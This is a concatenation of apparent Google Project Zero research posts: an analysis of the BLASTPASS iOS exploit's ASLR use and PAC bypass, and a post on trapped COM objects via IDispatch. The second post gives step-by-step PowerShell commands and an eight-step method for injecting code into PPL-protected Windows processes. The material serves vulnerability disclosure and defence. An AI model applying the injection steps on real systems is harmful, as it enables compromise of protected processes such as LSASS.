    In addition to the samples, I was also able to obtain a number of crash logs from failed exploit attempts where those samples were thrown, which meant I could figure out the ASLR slide of the MessagesBlastDoorService when the exploit failed. In combination with the target device and exact OS build (also contained in the crash log) I could then obtain the matching dyld_shared_cache, subtract the runtime ASLR slide from a bunch of the pointer-looking things in the 1MB object and take a look at them.

    The simple answer is: the 1MB object contains a large number of hardcoded, pre-slid, valid pointers. There's no weird machine, tricks or universal gadget here. By the time the PKPass is built and sent by the attackers they already know both the target device type and build as well as the runtime ASLR slide of the MessagesBlastDoorService...

    Based on analysis by iVerify, as well as analysis of earlier exploit chains published by Citizen Lab, my current working theory is that the large amount of HomeKit traffic seen in those cases is likely a separate ASLR/memory disclosure exploit.

    Caveat III: Pointer Authentication

    In the years since PAC was introduced we've seen a whole spectrum of interesting ways to either defeat, or just avoid, PAC. So what did these attackers do? To understand that let's follow the CFReadStream destruction code closely. (All these code snippets are from the most recently available version of CF from 2015, but the code doesn't seem to have changed much.)

    Here's the definition of the CFReadStream:

    static const CFRuntimeClass __CFReadStreamClass = {

        0,

        "CFReadStream",

        NULL,      // init

        NULL,      // copy

        __CFStreamDeallocate,

        NULL,

        NULL,

        NULL,      // copyHumanDesc

        __CFStreamCopyDescription

    };

    When a CFReadStream is passed to CFRelease, it will call __CFStreamDeallocate:

    static void __CFStreamDeallocate(CFTypeRef cf) {

      struct _CFStream *stream = (struct _CFStream *)cf;

      const struct _CFStreamCallBacks *cb =

        _CFStreamGetCallBackPtr(stream);

      CFAllocatorRef alloc = CFGetAllocator(stream);

      _CFStreamClose(stream);

    _CFStreamGetCallBackPtr just returns the CFStream's callBacks field:

    CF_INLINE const struct _CFStreamCallBacks *_CFStreamGetCallBackPtr(struct _CFStream *stream) {

        return stream->callBacks;

    }

    Here's _CFStreamClose:

    CF_PRIVATE void _CFStreamClose(struct _CFStream *stream) {

      CFStreamStatus status = _CFStreamGetStatus(stream);

      const struct _CFStreamCallBacks *cb =

        _CFStreamGetCallBackPtr(stream);

      if (status == kCFStreamStatusNotOpen || 

          status == kCFStreamStatusClosed ||

           (status == kCFStreamStatusError &&

            __CFBitIsSet(stream->flags, HAVE_CLOSED)

          ))

      {

        // Stream is not open from the client's perspective;

        // do not callout and do not update our status to "closed"

        return;

      }

      if (! __CFBitIsSet(stream->flags, HAVE_CLOSED)) {

            __CFBitSet(stream->flags, HAVE_CLOSED);

            __CFBitSet(stream->flags, CALLING_CLIENT);

        if (cb->close) {

          cb->close(stream, _CFStreamGetInfoPointer(stream));

        }

    _CFStreamGetStatus extracts the status bitfield from the flags field:

    #define __CFStreamGetStatus(x) __CFBitfieldGetValue((x)->flags, MAX_STATUS_CODE_BIT, MIN_STATUS_CODE_BIT)

    Looking at the 1MB object again the flags field is the first non-base field:

    00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    00000010  00 00 00 00 00 00 00 00  80 26 00 00 01 00 00 00  |.........&......|

    00000020  1f 00 00 00 00 00 00 00  10 00 8b 56 02 00 00 00  |...........V....|

    00000030  b0 c3 31 16 02 00 00 00  48 e3 01 00 00 00 00 00  |..1.....H.......|

    00000040  20 ec 46 58 02 00 00 00  00 00 00 00 00 00 00 00  | .FX............|

    00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    00000060  00 00 00 00 00 00 00 00  60 bf 31 16 02 00 00 00  |........`.1.....|

    00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    That gives a status code of 0x1f with all the other flags bits clear. This gets through the two conditional branches to reach this close callback call:

      if (cb->close) {

        cb->close(stream, _CFStreamGetInfoPointer(stream));

      }

    At this point we need to switch to looking at the assembly to see what's really happening:

    __CFStreamClose

    var_30= -0x30

    var_20= -0x20

    var_10= -0x10

    var_s0=  0

    PACIBSP

    STP             X24, X23, [SP,#-0x10+var_30]!

    STP             X22, X21, [SP,#0x30+var_20]

    STP             X20, X19, [SP,#0x30+var_10]

    STP             X29, X30, [SP,#0x30+var_s0]

    ADD             X29, SP, #0x30

    MOV             X19, X0

    BL              __CFStreamGetStatus

    CBZ             X0, loc_187076958

    The fake CFReadStream is the first argument to this function, so passed in the X0 register. It's then stored into X19 so it survives the call to __CFStreamGetStatus.

    Skipping ahead past the flag checks we reach the callback callsite (this is also the crash site seen earlier):

    LDR             X8, [X19,#0x30]

    ...

    LDR             X8, [X8,#0x58]

    CBZ             X8, loc_187076758

    LDR             X1, [X19,#0x28]

    MOV             X0, X19

    BLRAAZ          X8

    Let's walk through each instruction in turn there:

    First it loads the 64-bit value from X19+0x30 into X8:

    LDR             X8, [X19,#0x30]

    Looking at the hexdump of the 1MB object above this will load the value 0x25846ec20.

    From the crash reports we know the runtime ASLR slide of the MessagesBlastDoorService when this exploit was thrown was 0x3A8D0000, so subtracting that we can figure out where in the shared cache this pointer should point:

    0x25846ec20-0x3A8D0000=0x21DB9EC20

    It points into the __const segment of the TextToSpeechMauiSupport library in the shared cache:


[Image: assembly code snippet with the memory address 000000021DB9EC20 highlighted, followed by DataSectionWriter function definitions.]

    The next instruction adds 0x58 to that TextToSpeechMauiSupport pointer and reads a 64-bit value from there:

    LDR             X8, [X8,#0x58] // x8 := [0x21DB9EC20+0x58]

    This loads the pointer to the function _DataSectionWriter_CommitDataBlock from 0x21DB9EC78.

    IDA is simplifying something for us here: the function pointer loaded there is actually signed with the A-family instruction key with a zero context. This signing happens transparently (either during load or when the page is faulted in).

    The remaining four instructions then check that the pointer wasn't NULL, load X1 from offset +0x28 in the fake 1MB object, move the pointer to the fake object back into X0 and call the PAC'ed _DataSectionWriter_CommitDataBlock function pointer via BLRAAZ:

    CBZ             X8, loc_187076758

    LDR             X1, [X19,#0x28]

    MOV             X0, X19

    BLRAAZ          X8

    Callback-Oriented Programming

    A well-known attack against PAC is to swap two valid, PAC'ed pointers which are signed in the same way but point to different places (e.g. swapping two function pointers with different semantics, allowing you to exploit those semantic differences).

    Since a large number of PAC-protected pointers are signed with the A-family instruction key with a zero-context value, there are a large number of pointers to choose from. "Just" having an ASLR defeat shouldn't be enough to achieve this though; surely you'd need to disclose the actual PAC'ed pointer value? But that's not what happened above.

    Notice that the CFStream objects don't directly contain the callback function pointers — there's an extra level of indirection. The CFStream object contains a pointer to a callback structure, and that structure has the PAC'd function pointers. And crucially: that first pointer, the one to the callbacks structure, isn't protected by PAC. This means that the attackers can freely swap pointers to callback structures, operating one-level removed from the function pointers.

    This might seem like a severe constraint, but the dyld_shared_cache is vast and there are easily enough pre-existing callback structures to build a "callback-oriented JOP" chain, chaining together unsigned pointers to signed function pointers.

    The initial portion of the payload is a large callback-oriented JOP chain which is used to bootstrap the evaluation of the next payload stage, a large NSExpression.

    Similarities

There are a number of similarities between this exploit chain and PWNYOURHOME, an earlier exploit also attributed by Citizen Lab to NSO, described in this blog post in April 2023.

    That chain also had an initial stage targeting HomeKit, followed by a stage targeting MessagesBlastDoorService and also involving a MakerNote object — the Citizen Lab post claims that at the time the MakerNote was inside a PNG file. My guess would be that that PNG was being used as the delivery mechanism for the MakerNote bplist heap grooming primitives discussed in this post.

    Based on Citizen Lab's description it also seems like PWNYOURHOME was leveraging a similar callback-oriented JOP technique, and it seems likely that there was also a HomeKit-based ASLR disclosure. The PWNYOURHOME post has a couple of extra details around a minor fix which Apple made, preventing parsing of "certain HomeKit messages unless they arrive from a plausible source." But there still aren't enough details to figure out the underlying vulnerability or primitive. It seems likely to me that the same issue, or a variant thereof was still in use in BLASTPASS.

    Key material

    Matthias from iVerify presented an initial analysis of the NSExpression payload at BlackHat Asia in April 2024. In early July 2024, Matthias and I took a closer look at the final stages of the NSExpression payload which decrypts an AES-encrypted NSExpression and executes it.

    It seems very likely that the encrypted payload contains a BlastDoor sandbox escape. Although the BlastDoor sandbox profile is fairly restrictive it still allows access to a number of system services like notifyd, logd and mobilegestalt. In addition to the syscall attack surface there's also a non-trivial IOKit driver attack surface:

    ...

    (allow iokit-open-user-client

            (iokit-user-client-class "IOSurfaceRootUserClient")

            (iokit-user-client-class "IOSurfaceAcceleratorClient")

            (iokit-user-client-class "AGXDevice"))

    (allow iokit-open-service)

    (allow mach-derive-port)

    (allow mach-kernel-endpoint)

    (allow mach-lookup

            (require-all

                    (require-not (global-name "com.apple.diagnosticd"))

                    (require-any

                            (global-name "com.apple.logd")

                            (global-name "com.apple.system.notification_center")

                            (global-name "com.apple.mobilegestalt.xpc"))))

    ...

    (This profile snippet was generated using the Cellebrite labs' fork of SandBlaster)

    In FORCEDENTRY the sandbox escape was contained directly in the NSExpression payload (though that was an escape from the less-restrictive IMTranscoderAgent sandbox). This time around it seems extra care has been taken to prevent analysis of the sandbox escape.

    The question is: where does the key come from? We had a few theories:

    • Perhaps the key is just obfuscated, and by completely reversing the NSExpression payload we can find it?
    • Perhaps the key is derived from some target-specific information?
    • Perhaps the key was somehow delivered in some other way and can be read from inside BlastDoor?

    We spent a day analysing the NSExpression payload and concluded that the third theory appeared to be the correct one. The NSExpression walks up the native stack looking for the communication ports back to imagent. It then hijacks that communication, effectively taking over responsibility for parsing all subsequent incoming requests from imagent for "defusing" of iMessage payloads. The NSExpression loops 100 times, parsing incoming requests as XPC messages, reading the request xpc dictionary then the data xpc data object to get access to the raw, binary iMessage format. It waits until the device receives another iMessage with a specific format, and from that message extracts an AES key which is then used to decrypt the next NSExpression stage and evaluate it.

    We were unable to recover any messages with the matching format and therefore unable to analyse the next stage of the exploit.

    Conclusion

In contrast to FORCEDENTRY, BLASTPASS's separation of the ASLR disclosure and RCE phases mitigated the need for a novel weird machine. Whilst the heap groom was impressively complicated and precise, the exploit still relied on well-known exploitation techniques. Furthermore, the MakerNote bplist groom and callback-JOP PAC defeat techniques appear to have been in use for multiple years, based on similarities with Citizen Lab's blog post from 2023, which looked at devices compromised in 2022.

    Enforcing much stricter requirements on the format of the bplist inside the MakerNote (for example: a size limit or a strict-parser mode which rejects duplicate keys) would seem prudent. The callback-JOP issue is likely harder to mitigate.

The HomeKit aspect of the exploit chain remains mostly a mystery, but it seems very likely that it was somehow involved in the ASLR disclosure. Samuel Groß's 2021 post "A Look at iMessage in iOS 14" mentioned that Apple added support for re-randomizing the shared cache slide of certain services. Ensuring that BlastDoor has a unique ASLR slide could be a way to mitigate this.

    This is the second in-the-wild NSO exploit which relied on simply renaming a file extension to access a parser in an unexpected context which shouldn't have been allowed.

    FORCEDENTRY had a .gif which was really a .pdf.

    BLASTPASS had a .png which was really a .webp.

    A basic principle of sandboxing is treating all incoming attacker-controlled data as untrusted, and not simply trusting a file extension.

    This speaks to a broader challenge in sandboxing: that current approaches based on process isolation can only take you so far. They increase the length of an exploit chain, but don't necessarily reduce the size of the initial remote attack surface. Accurately mapping, then truly reducing the scope of that initial remote attack surface should be a top priority.


    Windows Bug Class: Accessing Trapped COM Objects with IDispatch

30 January 2025, 14:57

    Posted by James Forshaw, Google Project Zero

    Object orientated remoting technologies such as DCOM and .NET Remoting make it very easy to develop an object-orientated interface to a service which can cross process and security boundaries. This is because they're designed to support a wide range of objects, not just those implemented in the service, but any other object compatible with being remoted. For example, if you wanted to expose an XML document across the client-server boundary, you could use a pre-existing COM or .NET library and return that object back to the client. By default when the object is returned it's marshaled by reference, which results in the object staying in the out-of-process server.

    This flexibility has a number of downsides, one of which is the topic of this blog, the trapped object bug class. Not all objects which can be remoted are necessarily safe to do so. For example, the previously mentioned XML libraries, in both COM and .NET, support executing arbitrary script code in the context of an XSLT document. If an XML document object is made accessible over the boundary, then the client could execute code in the context of the server process, which can result in privilege escalation or remote-code execution.

    There are a number of scenarios that can introduce this bug class. The most common is where an unsafe object is shared inadvertently. An example of this was CVE-2019-0555. This bug was introduced because when developing the Windows Runtime libraries an XML document object was needed. The developers decided to add some code to the existing XML DOM Document v6 COM object which exposed the runtime specific interfaces. As these runtime interfaces didn't support the XSLT scripting feature, the assumption was this was safe to expose across privilege boundaries. Unfortunately a malicious client could query for the old IXMLDOMDocument interface which was still accessible and use it to run an XSLT script and escape a sandbox.

Another scenario is where there exists an asynchronous marshaling primitive. This is where an object can be marshaled both by value and by reference and the platform chooses by reference as the default mechanism. For example, the FileInfo and DirectoryInfo .NET classes are both serializable, so can be sent to a .NET remoting service marshaled by value. But they also derive from the MarshalByRefObject class, which means they can be marshaled by reference. An attacker can leverage this by sending the server a serialized form of the object which, when deserialized, will create a new instance of the object in the server's process. If the attacker can read back the created object, the runtime will marshal it back to the attacker by reference, leaving the object trapped in the server process. Finally the attacker can call methods on the object, such as creating new files, which will execute with the privileges of the server. This attack is implemented in my ExploitRemotingService tool.

    The final scenario I'll mention as it has the most relevancy to this blog post is abusing the built in mechanisms the remoting technology uses to lookup and instantiate objects to create an unexpected object. For example, in COM if you can find a code path to call the CoCreateInstance API with an arbitrary CLSID and get that object passed back to the client then you can use it to run arbitrary code in the context of the server. An example of this form is CVE-2017-0211, which was a bug which exposed a Structured Storage object across a security boundary. The storage object supports the IPropertyBag interface which can be used to create an arbitrary COM object in the context of the server and get it returned to the client. This could be exploited by getting an XML DOM Document object created in the server, returned to the client marshaled by reference and then using the XSLT scripting feature to run arbitrary code in the context of the server to elevate privileges.

Where Does IDispatch Fit In?

    The IDispatch interface is part of the OLE Automation feature, which was one of the original use cases for COM. It allows for late binding of a COM client to a server, so that the object can be consumed from scripting languages such as VBA and JScript. The interface is fully supported across process and privilege boundaries, although it's more commonly used for in-process components such as ActiveX.

    To facilitate calling a COM object at runtime the server must expose some type information to the client so that it knows how to package up parameters to send via the interface's Invoke method. The type information is stored in a developer-defined Type Library file on disk, and the library can be queried by the client using the IDispatch interface's GetTypeInfo method. As the COM implementation of the type library interface is marshaled by reference, the returned ITypeInfo interface is trapped in the server and any methods called upon it will execute in the server's context.

The ITypeInfo interface exposes two interesting methods that can be called by a client: Invoke and CreateInstance. It turns out Invoke is not that useful for our purposes, as it's not supported for remoting; it can only be called if the type library is loaded in the current process. However, CreateInstance is implemented as remotable; it will instantiate a COM object from a CLSID by calling CoCreateInstance. Crucially, the created object will be in the server's process, not the client's.

    However, if you look at the linked API documentation there is no CLSID parameter you can pass to CreateInstance, so how does the type library interface know what object to create? The ITypeInfo interface represents any type which can be present in a type library. The type returned by GetTypeInfo just contains information about the interface the client wants to call, therefore calling CreateInstance will just return an error. However, the type library can also store information of "CoClass" types. These types define the CLSID of the object to create, and so calling CreateInstance will succeed.

How can we go from the interface type information object to one representing a class? The ITypeInfo interface provides us with the GetContainingTypeLib method, which returns a reference to the containing ITypeLib interface. That can then be used to enumerate all supported classes in the type library. It's possible one or more of the classes are not safe if exposed remotely. Let's go through a worked example using my OleView.NET PowerShell module. First, we want to find some target COM services which also support IDispatch. This will give us potential routes for privilege escalation.

    PS> $cls = Get-ComClass -Service

    PS> $cls | % { Get-ComInterface -Class $_ | Out-Null }

    PS> $cls | ? { $true -in $_.Interfaces.InterfaceEntry.IsDispatch } | 

            Select Name, Clsid

    Name                                       Clsid

    ----                                       -----

    WaaSRemediation                            72566e27-1abb-4eb3-b4f0-eb431cb1cb32

    Search Gathering Manager                   9e175b68-f52a-11d8-b9a5-505054503030

    Search Gatherer Notification               9e175b6d-f52a-11d8-b9a5-505054503030

    AutomaticUpdates                           bfe18e9c-6d87-4450-b37c-e02f0b373803

    Microsoft.SyncShare.SyncShareFactory Class da1c0281-456b-4f14-a46d-8ed2e21a866f

The -Service switch for Get-ComClass returns classes which are implemented in local services. We then query for all the supported interfaces; we don't need the output from this command as the queried interfaces are stored in the Interfaces property. Finally we select out any COM class which exposes IDispatch, resulting in 5 candidates. Next, we'll pick the first class, WaaSRemediation, and inspect its type library for interesting classes.

    PS> $obj = New-ComObject -Clsid 72566e27-1abb-4eb3-b4f0-eb431cb1cb32

    PS> $lib = Import-ComTypeLib -Object $obj

    PS> Get-ComObjRef $lib.Instance | Select ProcessId, ProcessName

    ProcessId ProcessName

    --------- -----------

        27020 svchost.exe

    PS> $parsed = $lib.Parse()

    PS> $parsed

    Name               Version TypeLibId

    ----               -------- ---------

    WaaSRemediationLib 1.0      3ff1aab8-f3d8-11d4-825d-00104b3646c0

    PS> $parsed.Classes | Select Name, Uuid

    Name                          Uuid

    ----                          ----

    WaaSRemediationAgent          72566e27-1abb-4eb3-b4f0-eb431cb1cb32

    WaaSProtectedSettingsProvider 9ea82395-e31b-41ca-8df7-ec1cee7194df

The script creates the COM object and then uses the Import-ComTypeLib command to get the type library interface. We can check that the type library interface is really running out of process by marshaling it with Get-ComObjRef and extracting the process information, showing it running in an instance of svchost.exe, the shared service executable. Inspecting the type library through the interface is painful; to make it easier to display what classes are supported, we can parse the library into an easier to use object model with the Parse method. We can then dump information about the library, including a list of its classes.

    Unfortunately for this COM object the only classes the type library supports are already registered to run in the service and so we've gained nothing. What we need is a class that is only registered to run in the local process, but is exposed by the type library. This is a possibility as a type library could be shared by both local in-process components and an out-of-process service.

    I inspected the other 4 COM classes (one of which is incorrectly registered and isn't exposed by the corresponding service) and found no useful classes to try and exploit. You might decide to give up at this point, but it turns out there are some classes accessible, they're just hidden. This is because a type library can reference other type libraries, which can be inspected using the same set of interfaces. Let's take a look:

    PS> $parsed.ReferencedTypeLibs

    Name   Version TypeLibId

    ----   ------- ---------

    stdole 2.0     00020430-0000-0000-c000-000000000046

    PS> $parsed.ReferencedTypeLibs[0].Parse().Classes | Select Name, Uuid

    Name       Uuid

    ----       ----

    StdFont    0be35203-8f91-11ce-9de3-00aa004bb851

    StdPicture 0be35204-8f91-11ce-9de3-00aa004bb851

    PS> $cls = Get-ComClass -Clsid 0be35203-8f91-11ce-9de3-00aa004bb851

    PS> $cls.Servers

               Key Value

               --- -----

    InProcServer32 C:\Windows\System32\oleaut32.dll

In the example we can use the ReferencedTypeLibs property to show what type libraries were encountered when the library was parsed. We can see a single entry for stdole, which is basically always going to be imported. If you're lucky, maybe there are other imported libraries that you can inspect. We can parse the stdole library to inspect its list of classes. There are two classes exported by the type library; if we inspect the servers for StdFont we can see that it is only specified to be creatable in process, so we now have a target class to look for bugs. To get an out-of-process interface for the stdole type library we need to find a type which references it. The reason for the reference is that common interfaces such as IUnknown and IDispatch are defined in the library, so we need to query the base type of an interface we can directly access. Let's try to create the object in the COM service.

    PS> $iid = $parsed.Interfaces[0].Uuid

    PS> $ti = $lib.GetTypeInfoOfGuid($iid)

    PS> $href = $ti.GetRefTypeOfImplType(0)

    PS> $base = $ti.GetRefTypeInfo($href)

    PS> $stdole = $base.GetContainingTypeLib()

    PS> $stdole.Parse()

    Name   Version TypeLibId

    ----   ------- ---------

    stdole 2.0     00020430-0000-0000-c000-000000000046

    PS> $ti = $stdole.GetTypeInfoOfGuid("0be35203-8f91-11ce-9de3-00aa004bb851")

    PS> $font = $ti.CreateInstance()

    PS> Get-ComObjRef $font | Select ProcessId, ProcessName

    ProcessId ProcessName

    --------- -----------

        27020 svchost.exe

PS> Get-ComInterface -Object $font

    Name                 IID                                  HasProxy   HasTypeLib

    ----                 ---                                  --------   ----------

    ...

    IFont                bef6e002-a874-101a-8bba-00aa00300cab True       False

    IFontDisp            bef6e003-a874-101a-8bba-00aa00300cab True       True

We query the base type of an existing interface through a combination of GetRefTypeOfImplType and GetRefTypeInfo, then use GetContainingTypeLib to get the referenced type library interface. We can parse the library to be confident that we've got the stdole library. Next we get the type info for the StdFont class and call CreateInstance. We can inspect the object's process to ensure it was created out of process; the result shows it's trapped in the service process. As a final check we can query for the object's interfaces to prove that it's a font object.

Now we just need to find a way of exploiting one of these two classes. The first problem is that only the StdFont object can be accessed; the StdPicture object does a check to prevent it being used out of process. I couldn't find useful exploitable behavior in the font object, but I didn't spend too much time looking. Of course, if anyone else wants to look for a suitable bug in the class then go ahead.

    This research was therefore at a dead end, at least as far as system services go. There might be some COM server accessible from a sandbox but an initial analysis of ones accessible from AppContainer didn't show any obvious candidates. However, after thinking a bit more about this I realized it could be useful as an injection technique into a process running at the same privilege level. For example, we could hijack the COM registration for StdFont, to point to any other class using the TreatAs registry key. This other class would be something exploitable, such as loading the JScript engine into the target process and running a script.

    Still, injection techniques are not something I'd usually discuss on this blog, that's more in the realm of malware. However, there is a scenario where it might have interesting security implications. What if we could use this to inject into a Windows Protected Process? In a strange twist of fate, the WaaSRemediationAgent class we've just been inspecting might just be our ticket to ride:

    PS> $cls = Get-ComClass -Clsid 72566e27-1abb-4eb3-b4f0-eb431cb1cb32

    PS> $cls.AppIDEntry.ServiceProtectionLevel

    WindowsLight

When we inspect the protection level for the hosting service, it's configured to run at the PPL-Windows level! Let's see if we can salvage some value out of this research.

    Protected Process Injection

    I've blogged (and presented) on the topic of injecting into Windows Protected Processes before. I'd recommend re-reading that blog post to get a better background of previous injection attacks. However, one key point is that Microsoft does not consider PPL a security boundary and so they won't generally fix any bugs in a security bulletin in a timely manner, but they might choose to fix it in a new version of Windows.

The idea is simple: we'll redirect the StdFont class registration to point to another class so that when we create it via the type library it'll be running in the protected process. Using StdFont keeps the technique generic, as we could move to a different COM server if WaaSRemediationAgent is removed. We just need a suitable class which gets us arbitrary code execution and which also works in a protected process.

Unfortunately this immediately rules out any of the scripting engines like JScript. If you've re-read my last blog post, the Code Integrity module explicitly blocks the common script engines from loading in a protected process. Instead, I need a class which is accessible out of process and can be loaded into a protected process. I realized one option is to load a registered .NET COM class. I've blogged about how .NET DCOM is exploitable, and shouldn't be used, but in this case we want the bugginess.

    The blog post discussed exploiting serialization primitives, however there was a much simpler attack which I exploited by using the System.Type class over DCOM. With access to a Type object you could perform arbitrary reflection and call any method you liked, including loading an assembly from a byte array which would bypass the signature checking and give full control over the protected process.

Microsoft fixed this behavior, but they left a configuration value, AllowDCOMReflection, which allows you to turn it back on again. As we're not elevating privileges, and we have to be running as an administrator to change the COM class registration information anyway, we can just enable DCOM reflection by writing AllowDCOMReflection as a DWORD value of 1 to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework key before loading the .NET framework into the protected process.

    The following steps need to be taken to achieve injection:

    1. Enable DCOM reflection in the registry.
    2. Add the TreatAs key to redirect StdFont to the System.Object COM class.
    3. Create the WaaSRemediationAgent object.
    4. Use the type library to get the StdFont class type info.
    5. Create a StdFont object using the CreateInstance method which will really load the .NET framework and return an instance of the System.Object class.
    6. Use .NET reflection to call the System.Reflection.Assembly::Load method with a byte array.
    7. Create an object in the loaded assembly to force code to execute.
    8. Cleanup all registry changes.

You'll need to do these steps in a non-.NET language, as otherwise the serialization mechanisms will kick in and recreate the reflection objects in the calling process. I wrote my PoC in C++, but you can probably do it from things like Python if you're so inclined. I'm not going to make the PoC available, but the code is very similar to the exploit I wrote for CVE-2014-0257; that'll give you an example of how to use DCOM reflection in C++. Also note that the default for .NET COM objects is to run them using the v2 framework, which is no longer installed by default. Rather than mess around with getting this working with v4, I just installed v2 from the Windows components installer.

My PoC worked first time on Windows 10, but unfortunately when I ran it on Windows 11 24H2 it failed. I could create the .NET object, but calling any method on it failed with the error TYPE_E_CANTLOADLIBRARY. I could have stopped here, having proven my point, but I wanted to know what was failing on Windows 11. Let's finish up by diving into that, to see if we can do something to get it to work on the latest version of Windows.

    The Problem with Windows 11

I was able to prove that the issue was related to protected processes: if I changed the service registration to run unprotected then the PoC worked. Therefore something must be blocking the loading of the library specifically when running in a protected process. This didn't seem to impact type libraries generally, as the loading of stdole worked just fine, so it was something specific to .NET.

After inspecting the behavior of the PoC with Process Monitor it was clear the mscorlib.tlb library was being loaded to implement the stub class in the server. For some reason it failed to load, which prevented the stub from being created, which in turn caused any call to fail. At this point I had an idea of what was happening. In the previous blog post I discussed attacking the NGEN COM process by modifying the type library it used to create the interface stub to introduce a type-confusion. This allowed me to overwrite the KnownDlls handle and force an arbitrary DLL to get loaded into memory. I knew from the work of Clément Labro and others that most of the attacks around KnownDlls are now blocked, but I suspected that there was also some sort of fix for the type library type-confusion trick.

    Digging into oleaut32.dll I found the offending fix, the VerifyTrust method is shown below:

    NTSTATUS VerifyTrust(LoadInfo *load_info) {
      PS_PROTECTION protection;
      BOOL is_protected;

      CheckProtectedProcessForHardening(&is_protected, &protection);
      if (!is_protected)
        return SUCCESS;
      ULONG flags;
      BYTE level;
      HANDLE handle = load_info->Handle;
      NTSTATUS status = NtGetCachedSigningLevel(handle, &flags, &level,
                                                NULL, NULL, NULL);
      if (FAILED(status) ||
         (flags & 0x182) == 0 ||
         FAILED(NtCompareSigningLevels(level, 12))) {
        status = NtSetCachedSigningLevel(0x804, 12, &handle, 1, handle);
      }
      return status;
    }

    This method is called during the loading of the type library. It's using the cached signing level, again something I mentioned in the previous blog post, to verify if the file has a signing level of 12, which corresponds to Windows signing level. If it doesn't have the appropriate cached signing level the code will try to use NtSetCachedSigningLevel to set it. If that fails it assumes the file can't be loaded in the protected process and returns the error, which results in the type library failing to load. Note, a similar fix blocks the abuse of the Running Object Table to reference an out-of-process type library, but that's not relevant to this discussion.

    Based on the output from Get-AuthenticodeSignature, the mscorlib.tlb file is signed, admittedly via a catalog signature. The signing certificate is Microsoft Windows Production PCA 2011, exactly the same certificate as the .NET runtime DLL, so there should be no reason it wouldn't get a Windows signing level. Let's try to set the cached signing level manually using my NtObjectManager PowerShell module to see if we get any insights:

    PS> $path = "C:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.tlb"
    PS> Set-NtCachedSigningLevel $path -Flags 0x804 -SigningLevel 12 -Win32Path
    Exception calling "SetCachedSigningLevel" with "4" argument(s): "(0xC000007B) - {Bad Image}
    %hs is either not designed to run on Windows or it contains an error. Try installing the program again using the
    original installation media or contact your system administrator or the software vendor for support. Error status 0x"
    PS> Format-HexDump $path -Length 64 -ShowAll
              00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F  - 0123456789ABCDEF
    -----------------------------------------------------------------------------
    00000000: 4D 53 46 54 02 00 01 00 00 00 00 00 09 04 00 00  - MSFT............
    00000010: 00 00 00 00 43 00 00 00 02 00 04 00 00 00 00 00  - ....C...........
    00000020: 25 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00  - %...............
    00000030: 2E 0D 00 00 33 FA 00 00 F8 08 01 00 FF FF FF FF  - ....3...........

    Setting the signing level gives us the STATUS_INVALID_IMAGE_FORMAT error. Looking at the first 64 bytes of the type library file shows that it's a raw type library rather than one packaged in a PE file. This is fairly uncommon on Windows; even when a file has the extension TLB, it's common for the type library to still be packed into a PE file as a resource. I guess we're out of luck: unless we can set a cached signing level on the file, it will be blocked from loading into the protected process, and we need it to load to support the stub class to call the .NET interfaces over DCOM.
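    The hex dump above shows the raw "MSFT" magic; a type library packaged in a PE file would instead start with the "MZ" DOS header. As an illustrative sketch (a hypothetical helper, not part of any tool mentioned here), the distinction boils down to a magic-byte check:

    ```python
    def classify_tlb(data: bytes) -> str:
        """Classify a .tlb file by its leading magic bytes (sketch, not exhaustive)."""
        if data[:4] == b"MSFT":
            return "raw type library"  # raw MSFT-format type library, as in Framework64
        if data[:2] == b"MZ":
            return "PE image"          # type library packed into a PE file as a resource
        return "unknown"

    # First bytes taken from the hex dump above:
    classify_tlb(b"MSFT\x02\x00\x01\x00")  # -> "raw type library"
    ```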

    As an aside, I oddly have a Windows 11 VM in which setting a cached signing level on the non-DLL form of the type library does work. I must have changed the VM's configuration in some way to enable this, but I've no idea what that change is and I've decided not to dig further into it.

    We could try and find a previous version of the type library file which is both validly signed, and is packaged in a PE file, however, I'd rather not do that. Of course there's almost certainly another COM object we could load rather than .NET which might give us arbitrary code execution but I'd set my heart on this approach. In the end the solution was simpler than I expected, for some reason the 32 bit version of the type library file (i.e. in Framework rather than Framework64) is packed in a DLL, and we can set a cached signing level on it.

    PS> $path = "C:\windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb"
    PS> Format-HexDump $path -Length 64 -ShowAll
              00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F  - 0123456789ABCDEF
    -----------------------------------------------------------------------------
    00000000: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  - MZ..............
    00000010: B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  - ........@.......
    00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  - ................
    00000030: 00 00 00 00 00 00 00 00 00 00 00 00 B8 00 00 00  - ................
    PS> Set-NtCachedSigningLevel $path -Flags 0x804 -SigningLevel 12 -Win32Path
    PS> Get-NtCachedSigningLevel $path -Win32Path
    Flags               : TrustedSignature
    SigningLevel        : Windows
    Thumbprint          : B9590CE5B1B3F377EAA6F455574C977919BB785F12A444BEB2...
    ThumbprintBytes     : {185, 89, 12, 229...}
    ThumbprintAlgorithm : Sha256

    Thus to exploit on Windows 11 24H2 we can swap the type library registration path from the 64 bit version to the 32 bit version and rerun the exploit. The VerifyTrust function will automatically set the cached signing level for us so we don't need to do anything to make it work. Even though it's technically a different version of the type library, it doesn't make any difference for our use case and the stub generator code doesn't care.

    Conclusions

    In this blog post I discussed an interesting type of bug class on Windows, although it is applicable to any similar object-oriented cross-process remoting protocol. It shows how you can get a COM object trapped in a more privileged process by exploiting a feature of OLE Automation, specifically the IDispatch interface and type libraries.

    While I wasn't able to demonstrate a privilege escalation, I showed how you can use the IDispatch interface exposed by the WaaSRemediationAgent class to inject code into a PPL-Windows process. While this isn't the highest possible protection level, it allows access to the majority of processes running protected, including LSASS. We saw that Microsoft has done some work to try and mitigate existing attacks such as type library type confusions, but in our case this mitigation shouldn't have blocked the load as we didn't need to change the type library itself. While the attack required admin privileges, the general technique does not: as a normal user you could modify the local user's COM and .NET registrations to perform the attack and inject into a PPL, if you can find a suitable COM server exposing IDispatch.


    Windows Exploitation Tricks: Trapping Virtual Memory Access (2025 Update)

    30 de Janeiro de 2025, 14:57

    Posted by James Forshaw, Google Project Zero

